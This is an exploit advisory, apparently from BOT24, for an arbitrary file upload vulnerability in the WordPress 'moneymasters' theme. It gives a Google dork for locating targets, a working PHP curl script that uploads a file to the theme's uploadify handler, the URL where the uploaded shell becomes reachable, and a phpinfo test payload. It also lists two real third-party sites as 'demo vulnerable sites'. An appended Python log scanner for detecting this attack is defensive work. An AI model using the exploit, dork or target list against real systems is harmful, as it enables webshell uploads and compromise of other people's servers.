Wordpress Themes moneymasters Arbitrary File Upload Vulnerability | BOT24

#######################################################
# Author => Fayzoun
# Facebook => http://fb.me/fayzoun.no.love
# Facebook page => http://fb.me/fayzoun.AO
# Google Dork => inurl:/wp-content/themes/moneymasters
# Mail : fayzoun2@yahoo.fr / fayzoun@gmail.com
#######################################################
# Exploit:
<?php

$uploadfile="Fayzoun.php";
$ch = curl_init("http://www.vulnsite.com");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
-------------------
<?php
phpinfo();
?>
------------------------------
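
For defenders, an added example (not part of the original advisory) that scans a web-server access log for the sequence described above: a POST to the theme's uploadify.php, then a request for a PHP file served from the same directory. The combined log format, the sample log lines and all function and variable names are assumptions made for this example.

```python
import re

# Directory the advisory names as the upload handler's location and as the
# place where the uploaded file becomes reachable.
UPLOAD_DIR = "/wp-content/themes/moneymasters/code/uploadify/"
HANDLER = UPLOAD_DIR + "uploadify.php"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2013:10:01:02 +0000] "GET /wp-content/themes/moneymasters/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2013:10:05:40 +0000] "POST /wp-content/themes/moneymasters/code/uploadify/uploadify.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.9 - - [12/Mar/2013:10:05:44 +0000] "GET /wp-content/themes/moneymasters/code/uploadify/random_name.php HTTP/1.1" 200 70213 "-" "-"',
    '198.51.100.7 - - [12/Mar/2013:10:06:00 +0000] "GET /wp-content/themes/moneymasters/code/uploadify/uploadify.swf HTTP/1.1" 200 23000 "-" "Mozilla/5.0"',
]

def find_upload_abuse(lines):
    """Return findings as (kind, client_ip, timestamp, path) tuples."""
    findings, upload_seen = [], False
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m["path"].split("?", 1)[0]
        lower = path.lower()  # the server may treat paths case-insensitively
        if not lower.startswith(UPLOAD_DIR):
            continue
        ok = m["status"].startswith("2")
        if lower == HANDLER and m["method"] == "POST":
            upload_seen = upload_seen or ok  # only a 2xx counts as accepted
            findings.append(("upload_post", m["ip"], m["ts"], path))
        elif SCRIPT_EXT.search(lower) and lower != HANDLER and ok:
            # A script served from an upload directory should never exist.
            kind = "script_after_upload" if upload_seen else "script_in_upload_dir"
            findings.append((kind, m["ip"], m["ts"], path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

A `script_in_upload_dir` finding without a preceding `upload_post` still deserves review, since the upload may predate the log window being scanned.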

[#] Demo vulnerable sites:

http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
##################################################
Gretz To : .:: شهداء الأقصى ::. - Pal Snipre - The Wolf - Salem Hassine
Thanks To: God Allah

//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.